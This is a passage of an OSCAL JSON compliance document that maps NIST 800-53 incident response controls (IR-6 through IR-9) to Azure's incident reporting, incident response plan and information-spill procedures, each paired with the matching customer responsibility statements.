if a customer VM is breached due to a poor password).","provided-uuid":"6641e48a-b395-4864-88c1-06384b152b0e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ef7425a7-99c9-43d4-aade-96eb19ea628e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-6.1","statements":[{"uuid":"ff13f071-5a15-43f0-9b42-34e4d37cb59d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-025"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6.1_smt","by-components":[{"uuid":"72470177-6c66-449e-bf94-67252fdee74c","export":{"provided":[{"uuid":"4a241db6-1fbd-4b80-9d5f-a54bec7e152a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-025"}],"description":"Azure automates incident reporting through use of Incident Management (IcM) connectors which trigger the creation of an incident via detection logic. Azure Security Monitoring (ASM) and SCUBA are the primary automated monitoring systems for security event reporting used within Azure. 
Any alerts or detections fired by ASM or SCUBA notify either the service team which owns the asset or the Security Response Team, depending on what is most appropriate, via IcM."}],"responsibilities":[{"uuid":"0b3f9ded-1084-426e-9da5-621c9c3aa825","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-025"}],"description":"The customer is responsible for employing automated mechanisms to support incident reporting (e.g., ticketing and incident tracking/reporting systems).","provided-uuid":"4a241db6-1fbd-4b80-9d5f-a54bec7e152a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1d5449d1-c107-4874-af50-4611d88dde08","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-6.3","statements":[{"uuid":"1f2ea6fe-6787-44a3-83b0-1c06729a8109","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-6.3_smt","by-components":[{"uuid":"3f0b259a-6e6f-4eaf-b50d-5a20d9d1eb53","export":{"provided":[{"uuid":"fbd1fe58-9d44-40fd-9f00-f2fc3dbf9a5e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-026"}],"description":"As part of Microsoft Supply Chain Security Program, Azure deploys a team responsible for leading and supporting supply chain risk management activities. The team members are introduced to industry-leading supply chain quality programs to support Azure cloud environments. 
The team members have established agreements and procedures with various Azure partner teams of supply chain such as Azure Security, Azure Federal Compliance, and CELA teams for the notification of supply chain compromises and findings that are a result of assessments. If findings are identified, stakeholders of Azure cloud environments are notified through the approval of CELA on communication plans. Remediation plans for supply chain compromises or findings during assessments are formulated to track until implementation by team members who lead and support supply chain risk management activities."}],"responsibilities":[{"uuid":"c3303081-26e2-455f-92d7-5c5813f513e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-026"}],"description":"The customer is responsible for providing incident information to providers of products or services and other supply chain organizations for incidents related to customer-deployed resources.","provided-uuid":"fbd1fe58-9d44-40fd-9f00-f2fc3dbf9a5e"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"26e910f7-777f-4ece-8fd5-21594b711ab6","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-7","statements":[{"uuid":"c5af4851-b40b-4e01-9fb9-2c8649621a60","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-027"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-7_smt","by-components":[{"uuid":"0908e6ab-8caf-4be3-be05-7b73ff5b4e0f","export":{"provided":[{"uuid":"2315bb4f-5e84-4fdc-878a-f8c6ee1a1d1f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-027"}],"description":"For all asset types, Azure implements both internal and external sites which offer advice and assistance to Azure personnel and customers for handling and reporting of security incidents. Internal: Azure sites are supported on SharePoint and internal access is granted to appropriate personnel. Internal Azure policies and procedures are distributed and published to a central SharePoint repository and are accessible to all Azure personnel. The Azure Security Response Team provides regular updates around event triage and incident management which are available to all applicable Azure incident management personnel. Azure uses the services of the Cyber Defense Operations Center (CDOC) to manage incident questions and reporting by Microsoft personnel. 
Microsoft personnel can report incidents using the email alias \"cdoc@microsoft.com\" or via Incident Management (IcM), which is then routed to the appropriate Azure team. Internal web pages offer advice and assistance to service teams for the handling and reporting of security incidents. These web pages provide the following information to Azure personnel: what security incidents are; how to identify such incidents; how to escalate security incidents; a list of sample security incidents; and whom to contact in the event of a security incident. The Azure Security Response Team also posts a phone number and email alias on their internal website. This contact information is provided for service team personnel to use when required to file a security incident. Additionally, security contact information is available as part of IcM. Depending on the nature of the incident, Azure may engage subject matter experts (SMEs) from other organizations within Microsoft to facilitate investigative needs. External: The Azure Trust Center describes how to submit a security incident in Azure. The Microsoft Developer Network (MSDN) webpage also provides support to customers and links them to a wide variety of web pages which provide guidance around information security incidents related to their cloud environment and customer support, if needed. Customers can report security events at any time through the customer support website handled by Customer Support Services (CSS). CSS routes the report to the appropriate service team. In addition, possible security incidents and abuse can be reported on <https://cert.microsoft.com/>. These reports are received by the Online Services Security and Compliance Security team and then routed to the appropriate service team to investigate and correct the event. There is also a dedicated phone line that is available on a twenty-four (24) hours a day, seven (7) days a week basis to report events at 1-866-676-6546. 
Working with the C+AI Security Response Team, external parties such as law enforcement, Information Security Programs (ISPs), and other partners can identify security issues. For example, the Global Infrastructure Alliance for Internet Security (GIAIS) utilizes the Microsoft Security Response Alliance to feed security concerns to Microsoft's online services which is then routed to the appropriate Azure service teams."}],"responsibilities":[{"uuid":"391c0196-0e7e-49ee-911f-d93409d2d901","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-027"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for providing incident response support resources that are integral to the organizational incident response capability, providing advice and assistance to users handling incidents.","provided-uuid":"2315bb4f-5e84-4fdc-878a-f8c6ee1a1d1f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"e703df5f-ef70-4bdb-86d2-39d009b0b2f1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-7.1","statements":[{"uuid":"363950dc-5852-4585-8b52-ff423d239dff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-028"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-7.1_smt","by-components":[{"uuid":"11b242b4-9ca0-4dca-bd7c-29f859e3fba4","export":{"provided":[{"uuid":"ccbee6fd-972c-4764-b774-f0cc8a8fad64","props":[{"ns":"https://azure
.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-028"}],"description":"Azure tracks events and incidents through Incident Management system (IcM) and Service Now (SNow) and employs Azure Security Monitoring (ASM) and SCUBA within the environment in support of the incident management process. These systems utilize automated mechanisms to identify incidents as well as document, track, and report incidents. For high severity incidents, Azure Security maintains an internal notification wiki site on the central Microsoft Teams repository. Azure teams and individuals can sign up to receive automated email alerts when SharePoint content is added or modified. Internal web pages and SOPs offer advice and assistance to service team personnel for the handling and reporting of security incidents, including the Azure Incident Management SOP and the service-team-specific incident management SOPs."}],"responsibilities":[{"uuid":"1b05180f-563c-4363-8f64-97aec1a86f07","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-028"}],"description":"The customer is responsible for using automated mechanisms to increase the availability of incident response support resources.
","provided-uuid":"ccbee6fd-972c-4764-b774-f0cc8a8fad64"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3139456b-7920-400f-a6fd-97826e0ce125","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-8","statements":[{"uuid":"3b70e730-26ca-4d9f-be3f-02c4ba69decf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-029"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.a","by-components":[{"uuid":"76d6c5be-55ba-4e42-8101-8d5f100f5cb9","export":{"provided":[{"uuid":"affa5874-6fb4-4702-846c-9fdca2fd017d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-029"}],"description":"Azure has developed and implemented the Incident Management SOP. The Incident Management SOP provides Azure a roadmap for implementing its incident management capability. The purpose of the SOP is to provide guidance concerning the responsibilities of involved parties during any incident that affects the confidentiality, integrity, or availability of Azure. 
The SOP provides a high-level approach for how the incident management capability fits into the overall organization and describes the structure and organization of the incident management capabilities, including: * Describing the end-to-end process of security incident management, and how it is executed across the various functional groups within Microsoft. * Defining a methodical approach that may be applied to resolve security incidents and escalate incidents to the proper internal authorities. The Incident Management SOP explains the different phases of the incident management lifecycle. Details for each of the phases are explained in the plan. The SOP also identifies the internal partners, cross-team contacts, roles and responsibilities, and lists the individuals and management support needed to effectively maintain and mature the incident management capability. The SOP provides guidance for classifying the incidents and assigning severity. It also provides the characteristics that could be associated with incidents to help categorize the incidents. Security incidents are tracked in a ticketing system where they are categorized and assigned a severity rating. Security incidents include, but are not limited to: e-mail viruses, rootkits, worms, denial of service attacks, unauthorized access, inappropriate use of network resources, any other type of unauthorized, unacceptable, unlawful activity involving Azure computer networks or data processing equipment, and compromise, disclosure, or use of information that occurs outside its intended purpose. There are five phases in the Azure incident management lifecycle: detect, assess, diagnose, stabilize and recover, and close. 
The SOP meets the unique requirements of the organization, which relate to mission, size, structure, and functions. The Microsoft Security Response Center (MSRC) is responsible for reporting on its efforts with Azure as a Quality of Service (QoS) Metric. Metrics are defined as the following: * Total Number of Incidents: The Security Response Team reports the total number of incidents experienced by online services and can report incidents with respect to incident category, property affected, and other dimensions. * Time to Detect (TTD): The time between when an incident began and when it was identified by the finder. This metric can only be determined after an investigation has been conducted by the Security Response Team. * Time to Engage (TTE): The time between when an incident is reported to the Security Response Team and when the Security Response Team takes action. * Time to Mitigate (TTM): The time between when an incident is reported to the Security Response Team and when the incident is mitigated and/or resolved. A formal Incident Report is produced by the service teams and augmented with the Azure Security Response Team's additions. These reports, which include lessons learned, are created for all events with a Severity 1 rating. For incidents of lesser severity, if there are significant lessons learned that have general applicability across the Azure environment, an incident report is created. The incident reports are maintained by Azure Security incident management or by the impacted service team and are provided to the relevant stakeholders for review."}],"responsibilities":[{"uuid":"7d02a835-4fc8-43d9-9ea9-d31d0f3d8251","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-029"}],"description":"The customer is responsible for developing an incident response plan for customer-deployed resources. 
The incident response plan should include: a roadmap for implementing its incident response capability; the structure and organization of the incident response capability; a high-level approach for how incident response fits into the customer's organization; how the plan meets unique customer requirements which relate to mission, size, structure and functions; a definition of reportable incidents; metrics for measuring incident response capability; resources and management support needed to effectively maintain and mature the incident response capability; and the personnel/roles responsible for reviewing and approving the plan.","provided-uuid":"affa5874-6fb4-4702-846c-9fdca2fd017d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8ceadf49-9de3-4d6d-b8ec-f90eef64dbf6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-030"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.b","by-components":[{"uuid":"f5512603-f2a6-4eda-ba7d-91b348f3a832","export":{"provided":[{"uuid":"4e9af8b1-6d89-4803-b7f3-9f124e7aae32","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-030"}],"description":"The SOP is stored in a centralized SharePoint site. 
Azure uses SharePoint access controls to protect the document from unauthorized disclosure or modification."}],"responsibilities":[{"uuid":"e9e5b81d-6779-4073-963b-7b8de2b2d64d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-030"}],"description":"The customer is responsible for distributing the incident response plan.","provided-uuid":"4e9af8b1-6d89-4803-b7f3-9f124e7aae32"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"e082b3ca-0428-4703-b3b6-834ad058cc7c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.c","by-components":[{"uuid":"253d1ed0-dc16-4892-8fe0-1e9ff291a271","export":{"provided":[{"uuid":"cd18dec2-b24a-4508-af52-b7493d1302e0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-031"}],"description":"At a minimum, the SOP is reviewed and updated annually. 
Additionally, if applicable, post-incident response action items for incidents may trigger changes to be applied to the SOP and accompanying playbooks as required."}],"responsibilities":[{"uuid":"c0405af8-15cb-4bdc-9503-af3477fc17f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-031"}],"description":"The customer is responsible for reviewing the incident response plan.","provided-uuid":"cd18dec2-b24a-4508-af52-b7493d1302e0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44fc9f74-184a-4020-809a-08c011f62e50","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-032"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.d","by-components":[{"uuid":"c8346782-c5a1-4e32-9d1a-612f153d9083","export":{"provided":[{"uuid":"fe5608b6-78b9-451e-aaad-897fd89532bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-032"}],"description":"Post-incident response action items for incidents may trigger changes to be applied to the SOP and accompanying playbooks as required."}],"responsibilities":[{"uuid":"85f62d35-eca2-4dbb-b7e8-a8c26b2248d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-032"}],"description":"The customer is responsible for updating the incident response plan.","provided-uuid":"fe5608b6-78b9-451e-aaad-897fd89532bd"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ce9b3e67-831c-422f-9904-a0670432a754","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-033"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-8_smt.e","by-components":[{"uuid":"2418b6e3-07b1-41c0-9cea-5ffd559e8348","export":{"provided":[{"uuid":"6a9423b2-65ad-4fe0-b966-34aa512cb1ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-033"}],"description":"After changes have been made to the SOP, it is made available for review to Azure personnel via a centralized SharePoint site."}],"responsibilities":[{"uuid":"8594fab8-26f0-435f-ae8f-c549f61614d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-033"}],"description":"The customer is responsible for communicating changes made to the incident response plan.","provided-uuid":"6a9423b2-65ad-4fe0-b966-34aa512cb1ea"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a425abc3-c27b-4d54-a18b-f1083881c2b8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9","statements":[{"uuid":"a965ad94-6f5a-4c83-9c82-0c029815fbe5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-034"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.a","by-components":[{"uuid":"8bf9da2e-6aed-4c3e-90b0-9b871392c546","export":{"provided":[{"uuid":"dcb955c7-f7bc-4567-9e08-27f5b75afa86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-034"}],"description":"The Azure Security Response Team consisting of Microsoft Cloud + AI Livesite, Privacy, and Security Teams, is responsible for responding to information spills. 
The team coordinates with service teams and partner groups in their response to an information spillage scenario."}],"responsibilities":[{"uuid":"26c810c8-e3df-4d21-a08d-db683f3afb3c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-034"}],"description":"The customer is responsible for assigning individuals for responding to information spills.","provided-uuid":"dcb955c7-f7bc-4567-9e08-27f5b75afa86"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4126c777-7e16-4c8b-b4a5-c87af1492945","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-035"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.b","by-components":[{"uuid":"2232f60f-580c-4fa6-b31f-54aeb24ee870","export":{"provided":[{"uuid":"2037a9ef-2ca1-4fb6-92e8-f81c73b468bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-035"}],"description":"In the event of an information spill, Azure initiates the incident management process to identify the specific information involved in the spill, as well as the assets or networks affected. 
Procedures exist to ensure that Azure personnel impacted by information spills can continue to carry out assigned tasks while contaminated services are undergoing corrective actions."}],"responsibilities":[{"uuid":"4344877e-946f-447a-a075-ed90dd4c1c9c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-035"}],"description":"The customer is responsible for identifying customer-controlled information involved in the information contamination.","provided-uuid":"2037a9ef-2ca1-4fb6-92e8-f81c73b468bd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1521b739-a930-49fd-811e-81384dc0075d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-036"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.c","by-components":[{"uuid":"06a69da8-54e1-4505-b2e8-74688606ad41","export":{"provided":[{"uuid":"8ef8fd84-458a-4ec4-a3c6-8703b010d73a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-036"}],"description":"The Azure incident management process includes notification of appropriate personnel as documented in the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"f2f7a8ba-732c-41d2-b1f3-36b312a95cf3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-036"}],"description":"The customer is responsible for responding to information spills of customer-controlled data, including the personnel/roles to be alerted of the information spill and the usage of a communication method that is not associated with the 
spill.","provided-uuid":"8ef8fd84-458a-4ec4-a3c6-8703b010d73a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ae39e93d-2d07-4ba1-8b6e-a204184fcdbe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-037"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.d","by-components":[{"uuid":"17f88cdc-d7b2-43e8-b3f1-1362323532ee","export":{"provided":[{"uuid":"87b10627-f8c0-4019-9f5a-e66609a2df17","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-037"}],"description":"In the instance of a contaminated asset or network, the Security Response Team isolates the spillage using rapid containment options available to properly address the reach of an information spillage. 
Some of the rapid containment options include powering off the asset, instituting Border Gateway Protocol (BGP) black hole routing, and making network configuration changes to contain the breach."}],"responsibilities":[{"uuid":"df0a03eb-02c5-48b6-afbf-ca1ed671e908","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-037"}],"description":"The customer is responsible for responding to information spills, including how the contaminated customer-deployed resources are isolated.","provided-uuid":"87b10627-f8c0-4019-9f5a-e66609a2df17"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"cf1814c3-8bf5-433a-8f9a-daa4a11cea6e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-038"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.e","by-components":[{"uuid":"0c2c1d14-bc24-4479-ac20-77a9a018af51","export":{"provided":[{"uuid":"3b873653-1d4a-4da6-87d4-8cb6e1348728","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-038"}],"description":"Upon identification of Azure assets containing spilled information, Azure incident management personnel take steps to eradicate that information. After the information spillage is contained, a cleanup process is initiated. The cleanup process involves locating, isolating, and deleting the contaminated data. 
In addition, data zeroing would be completed, in order to ensure mirrored data to replica sites are also cleansed."}],"responsibilities":[{"uuid":"2d0d09f2-1019-41c8-946b-952ae688cf2d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-038"}],"description":"The customer is responsible for responding to information spills, including the eradication of information from the contaminated customer-deployed resources.","provided-uuid":"3b873653-1d4a-4da6-87d4-8cb6e1348728"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"925fc660-fb16-4963-a729-69ca6ae63d65","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-039"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.f","by-components":[{"uuid":"6d3fc7e5-381c-46bb-9e07-15c7792fd228","export":{"provided":[{"uuid":"2a6bcb06-b3bb-422c-86e1-745e5b8c9840","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-039"}],"description":"The process of identifying contaminated assets followed by Azure includes identification of other assets to which data may have been replicated, and if necessary, further investigation of those assets."}],"responsibilities":[{"uuid":"c5a61715-513d-4243-b1a3-8b9ee9ed3917","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-039"}],"description":"The customer is responsible for responding to information spills of customer-controlled data, including the identification of other resources which may have been subsequently 
contaminated.","provided-uuid":"2a6bcb06-b3bb-422c-86e1-745e5b8c9840"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"ff919f62-377e-4fea-a147-ec3a4e970d03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-040"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9_smt.g","by-components":[{"uuid":"4e12d100-2125-4a17-9f90-051d52345c76","export":{"provided":[{"uuid":"443824be-714a-42fb-8a75-3654aeaba351","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-040"}],"description":"Azure incident management follows the incident management process in response to information spillage as documented in the Azure Incident Management Standard Operating Procedure (SOP)."}],"responsibilities":[{"uuid":"5ddf3d32-e541-4a7b-b0a2-ecf1ce7309f0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-040"}],"description":"The customer is responsible for defining and performing other customer-defined actions in response to information spills of customer-controlled data.","provided-uuid":"443824be-714a-42fb-8a75-3654aeaba351"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c7dcc082-51c4-457e-bfa5-6af0773fbaae","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-9.2","statements":[{"uuid":"1a1bd4d5-f983-4e9a-9307-00f5acc11b76","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-9.2_smt","by-components":[{"uuid":"7aa3e5c7-3e76-48cb-a7a9-65cf3c1640e5","export":{"provided":[{"uuid":"b486a4b3-05f3-46f3-ba71-633d1833d95c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-041"}],"description":"All personnel receive annual security training via Security and Privacy Foundations and STRIKE, which include information on incident management. 
